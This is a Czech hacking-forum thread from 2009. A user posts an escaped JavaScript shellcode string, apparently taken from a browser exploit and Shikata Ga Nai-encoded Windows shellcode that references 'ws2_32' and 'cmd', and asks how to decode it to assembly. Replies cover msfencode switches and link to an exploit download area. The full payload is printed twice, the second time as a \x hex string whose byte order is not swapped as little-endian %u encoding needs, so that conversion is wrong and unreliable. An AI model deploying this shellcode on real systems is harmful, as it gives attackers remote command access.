Jak dekódovat escape javascript do ASM - Shikata Ga Nai deco

PHP, Shell, Exploits, Utils, Programování (programovací jazyky, zdrojáky atp)
Odpovědět
Uživatelský avatar
rapl
Level 0
Příspěvky: 10
Registrován: 17 úno 2009, 15:40

21 úno 2009, 20:08

Zdravím, máte někdo radu, jak dekódovat do asm podoby escapovaný javascript kód jako například tento:

Kód: Vybrat vše

var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7
%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868
%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22
%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650
%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63
%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753
%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
Je to zakódováno Shikata Ga Nai enkodérem, který taky obsahuje dekodér, ale nejsem moc kamarád s debug nástroji, takže nevím jak přesně postupovat, abych z toho snadno dostal původní kód. Díky za každou radu.

Uživatelský avatar
backman
Level 7
Příspěvky: 304
Registrován: 30 čer 2008, 17:01
Bydliště: Praha [CZ]

22 úno 2009, 07:03

Ten použitý příkaz na zakodování pomocí Shikata Gai Nai byl jaký? msfencode používá jednoduché přepínače.. -e pro encode -d pro decode a -t pro target pokud se nepletu.. a target jest volitený (perl, c.. atd).

Pokud píšeš polymorfní vir nebo exploit.. k čemu potřebuješ cokoliv reversem nebo jinak enkódovat.. vždyť zdroják máš ne?
Ve Fóru používejte diakritiku a čtěte nápovědu než odešlete první post!

Uživatelský avatar
rapl
Level 0
Příspěvky: 10
Registrován: 17 úno 2009, 15:40

22 úno 2009, 09:04

Myslím si, že nejčastější používaný enkodér je asi ten metasploitský Msf::Encoder::ShikataGaNai, ale nemůžu s jistotou říct, že je to zakódováno zrovna tímhle enkodérem.
Potřebuji to dekódovat právě proto, že ten zdroják nemám. Kdybych neměl důvod, tak bych se zřejmě neptal. To je logické, ne?

Uživatelský avatar
cocaine
Level 7
Příspěvky: 398
Registrován: 29 dub 2008, 23:54
Bydliště: Země Oz

22 úno 2009, 16:25

Našel jsem to na jednom ruskem fóru, snad to bude to co hledáš..

Download viz download.airodump.net -> Download end -> Data/Exploit
Přílohy
metasploitgen.jpg
Jednou deset minut a ušetříš hodiny

Uživatelský avatar
android
Level 7
Příspěvky: 461
Registrován: 10 říj 2008, 22:48

22 úno 2009, 19:16

Stačí takhle?

Kód: Vybrat vše

\x43\x43\x43\x43\x43\xEB\x57\x56\x45\x8B\x8B\x3C\x05\x54\x01\x78\x52\xEA\x52\x8B\x01\x20\x31\xEA\x31\xC0\x41\xC9\x34\x8B\x01\x8A\x31\xEE\xC1\xFF\x13\xCF\x01\xAC\x85\xC7\x75\xC0\x39\xF6\x75\xDF\x5A\xEA\x5A\x8B\x01\x24\x66\xEB\x0C\x8B\x8B\x4B\x1C\x5A\xEB\x01\x04\x8B\x01\x8B\x5F\xE8\xFF\x5E\xFC\xE0\xC0\x31\x8B\x64\x30\x40\x40\x8B\x8B\x0C\x1C\x70\x8B\xAD\x08\x68\xC0\x31\xB8\x66\x6C\x6C\x68\x50\x32\x33\x64\x2E\x77\x68\x32\x73\x54\x5F\x71\xBB\xE8\xA7\xE8\xFE\xFF\x90\xFF\xFF\xEF\x89\xC5\x89\xC4\x81\xFE\x70\xFF\xFF\x31\x54\xFE\xC0\x40\xC4\xBB\x50\x7D\x22\x7D\xAB\x75\xE8\xFF\xFF\x31\xFF\x50\xC0\x50\x50\x40\x50\x40\x50\xBB\x50\x55\xA6\x79\x34\x61\xE8\xFF\xFF\x89\xFF\x31\xC6\x50\xC0\x35\x50\x01\x02\xCC\x70\xCC\xFE\x89\x50\x50\xE0\x10\x6A\x56\x50\x81\xBB\x2C\xB4\xE8\xBE\xFF\x42\xFF\xFF\xC0\x31\x56\x50\xD3\xBB\x58\xFA\xE8\x9B\xFF\x34\xFF\xFF\x60\x58\x10\x6A\x50\x54\xBB\x56\xF3\x47\xC6\x56\x23\xE8\xFF\xFF\x89\xFF\x31\xC6\x53\xDB\x2E\x68\x6D\x63\x89\x64\x41\xE1\xDB\x31\x56\x56\x53\x56\x31\x53\xFE\xC0\x40\xC4\x53\x50\x53\x53\x53\x53\x53\x53\x53\x53\x6A\x53\x89\x44\x53\xE0\x53\x53\x54\x53\x53\x50\x53\x53\x53\x43\x53\x4B\x51\x53\x87\x53\xBB\xFD\xD0\x21\xD0\x05\xDF\xE8\xFF\xFE\x5B\xFF\xC0\x31\x50\x48\xBB\x53\xCB\x43\x5F\x8D\xCF\xE8\xFF\xFE\x56\xFF\xEF\x87\x12\xBB\x6D\x6B\xE8\xD0\xFE\xC2\xFF\xFF\xC4\x83\x61\x5C\x89\xEB

Odpovědět
  • Informace
  • Kdo je online

    Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 1 host